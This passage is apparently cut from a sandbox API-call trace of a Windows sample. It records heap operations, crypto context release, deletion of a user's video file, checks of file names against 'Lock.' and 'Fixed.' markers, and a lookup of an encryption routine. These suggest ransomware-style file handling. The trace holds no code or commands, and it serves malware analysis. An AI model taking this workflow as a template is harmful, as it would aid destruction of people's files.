dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0258.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0258.610] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0258.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0258.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0258.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0258.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.610] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0258.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0258.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.611] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.612] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0258.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.612] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0258.612] FreeLibrary (hLibModule=0x756e0000) returned 1 [0258.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0258.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0258.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0258.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.612] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.612] CloseHandle (hObject=0x2a0) returned 1 [0258.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0258.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0258.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0258.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.615] CloseHandle (hObject=0x2d0) returned 1 [0258.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0258.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0258.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0258.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0258.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0258.620] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.620] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.620] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0258.621] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/hRmi.mkv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\hRmi.mkv", lpFilePart=0x8cedf4*="hRmi.mkv") returned 0x1f [0258.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0258.621] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\hRmi.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\hrmi.mkv")) returned 0x20 [0258.621] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\hRmi.mkv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8b90430, ftCreationTime.dwHighDateTime=0x1d5e95a, ftLastAccessTime.dwLowDateTime=0x40cbbc30, ftLastAccessTime.dwHighDateTime=0x1d5ef9f, ftLastWriteTime.dwLowDateTime=0x40cbbc30, ftLastWriteTime.dwHighDateTime=0x1d5ef9f, nFileSizeHigh=0x0, nFileSizeLow=0x3279, dwReserved0=0x1, dwReserved1=0x1c, cFileName="hRmi.mkv", cAlternateFileName="")) returned 0xa87050 [0258.621] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\hRmi.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\hrmi.mkv")) returned 1 [0258.704] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8b90430, ftCreationTime.dwHighDateTime=0x1d5e95a, ftLastAccessTime.dwLowDateTime=0x40cbbc30, ftLastAccessTime.dwHighDateTime=0x1d5ef9f, ftLastWriteTime.dwLowDateTime=0x40cbbc30, ftLastWriteTime.dwHighDateTime=0x1d5ef9f, nFileSizeHigh=0x0, nFileSizeLow=0x3279, dwReserved0=0x1, dwReserved1=0x1c, cFileName="hRmi.mkv", cAlternateFileName="")) returned 0 [0258.704] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0258.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0258.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0258.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0258.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0258.795] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0258.796] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0258.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0258.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0258.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0258.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0258.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0258.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0258.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0258.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0258.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0258.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.797] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/hRmi.mkv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\hRmi.mkv", lpFilePart=0x8cf650*="hRmi.mkv") returned 0x1f [0258.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0258.797] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\hRmi.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\hrmi.mkv")) returned 0xffffffff [0258.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0258.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0258.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0258.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0258.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0258.798] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.798] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.798] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0258.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0258.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0258.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0258.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0258.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XujfB_EFQdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ujfB_EFQdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jfB_EFQdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fB_EFQdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B_EFQdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_EFQdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFQdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FQdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QdQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YTzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TzBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bm8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.799] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0258.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0258.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0258.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0258.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XujfB_EFQdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ujfB_EFQdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jfB_EFQdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fB_EFQdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B_EFQdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_EFQdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFQdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FQdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QdQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YTzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TzBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bm8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m8.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.800] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0258.800] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0258.800] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0258.800] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0258.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x9787d0 [0258.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0258.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 